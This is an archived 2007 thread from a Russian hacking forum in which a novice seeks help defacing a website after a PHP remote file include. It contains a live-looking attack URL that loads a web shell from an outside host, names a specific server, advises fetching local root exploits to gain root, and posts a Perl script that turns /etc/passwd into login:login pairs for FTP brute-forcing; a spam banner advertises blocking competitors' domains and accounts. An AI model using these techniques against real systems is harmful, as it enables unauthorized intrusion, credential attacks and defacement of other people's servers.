УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Сканер Php Inc , Inj

Страница 3 из 4

Опции темы

Поиск в этой теме

Опции просмотра

#21

26.04.2007, 00:22

n1†R0x

Постоянный

Регистрация: 20.01.2007

Сообщений: 787

Провел на форуме:
2924346

Репутация: 1719

Отправить сообщение для n1†R0x с помощью ICQ

Цитата:

Сообщение от Xszz

да , да .
Я видел . Шелу на удалённом сервере можно поменять имя на 2ndmenu.

ну закачаешь ты файл 2ndmenu без расширения, и что дальше?

тем более, там в начале "c/".

Цитата:

Сообщение от Xszz

Вот меня ещё интересует вопрос :
Я нашел удалённый инклуд , подключил шелл http://newxs.narod.ru/shell.txt
Но , ничего не могу с помощью него сделать.
Фалы не изменяются , не закачиваются , папки не создаются.
Как можно зделать дэфэйс ?
Спасибо.

линк в студию

#22

26.04.2007, 00:29

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

chmod 777 /home/site/index.php

Цитата:

ну закачаешь ты файл 2ndmenu без расширения, и что дальше?

он всё равно выполнится как php код = )
Другое дело что там с/ в начале

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

#23

26.04.2007, 01:30

Xszz

Участник форума

Регистрация: 23.04.2007

Сообщений: 233

Провел на форуме:
671223

Репутация: 91

Отправить сообщение для Xszz с помощью ICQ

chmod 777 /home/site/index.php

права не меняются я пользуюсь r57shell может есть какой ещё ?

#24

26.04.2007, 01:36

Xszz

Участник форума

Регистрация: 23.04.2007

Сообщений: 233

Провел на форуме:
671223

Репутация: 91

http://212.41.0.34/index.php?fl=http://newxs.narod.ru/shell.txt&part=main

Линк взят из раздела "PHP Иньекции"

#25

26.04.2007, 10:10

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

выполняешь uname -a
Смотришь чё тебе выдало, например Linux 2.6.14
идёшь на милворм или в гугл
пишешь Linux 2.6.14 local root exploit
если есть плоенты для этой версии, качаешь его на сервер в папку /tmp и следуешь инструкциям написанным в плоенте =\
Получаешь рута, теперь ты хэкер и король. Делаешь дефейс я пляшешь вокруг него с бубном =\

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

#26

26.04.2007, 11:24

Xszz

Участник форума

Регистрация: 23.04.2007

Сообщений: 233

Провел на форуме:
671223

Репутация: 91

Понял !
Тренируюсь дальше

FreeBSD ns.sibstu.kts.ru 6.2-PRERELEASE FreeBSD 6.2-PRERELEASE #1: Tue Oct 31 18:11:44 KRAT 2006 serg@ns.sibstu.kts.

#27

26.04.2007, 11:39

Xszz

Участник форума

Регистрация: 23.04.2007

Сообщений: 233

Провел на форуме:
671223

Репутация: 91

Вот у меня возник ещё один вопрос , если я получаю содержимое файла etc/passwd что мне это даёт ?

#28

26.04.2007, 11:40

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

FreeBSD 6.2
чё то мне подсказывает что превад плоентов нету =\

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

#29

26.04.2007, 12:19

Xszz

Участник форума

Регистрация: 23.04.2007

Сообщений: 233

Провел на форуме:
671223

Репутация: 91

del

Вот смотрите , кто - то залил шелл свой на сервер , а у меня не получаетсья , как он зделал , если кто знает , расскажите .
И его шелл может все редактировать , создавать , удалять , короче гворя , полный доступ.
Спасибо

Последний раз редактировалось [ cash ]; 26.04.2007 в 12:23..

#30

26.04.2007, 16:29

~~zl0ba~~

Banned

Регистрация: 10.10.2006

Сообщений: 596

Провел на форуме:
2132613

Репутация: 1365

Цитата:

Сообщение от Xszz

Вот у меня возник ещё один вопрос , если я получаю содержимое файла etc/passwd что мне это даёт ?

Можно пропарсить и побрутить FTP на login:login вдруг повезёт.

Вот парсер:

Код:

#!/usr/bin/perl 
$in=$ARGV[0]; 
$out=$ARGV[1]; ## определим параметры скрипта 
exit print "Use $0 $in $out\n" unless ($out); 
open(IN, "$in"); 
open(OUT, ">out"); 
while(<IN>){ 
chomp; 
if (~/sh$/){ ## запишем только валидные аккаунты 
($u,@udef)=split ":"; 
print OUT "$u:$u\n"; ## В виде пары login:login 
} 
} 
close(IN); 
close(OUT);

Страница 3 из 4

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Books	PSalm69	Избранное	273	13.02.2016 01:24
Books PHP	FRAGNATIC	PHP	186	21.02.2010 02:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход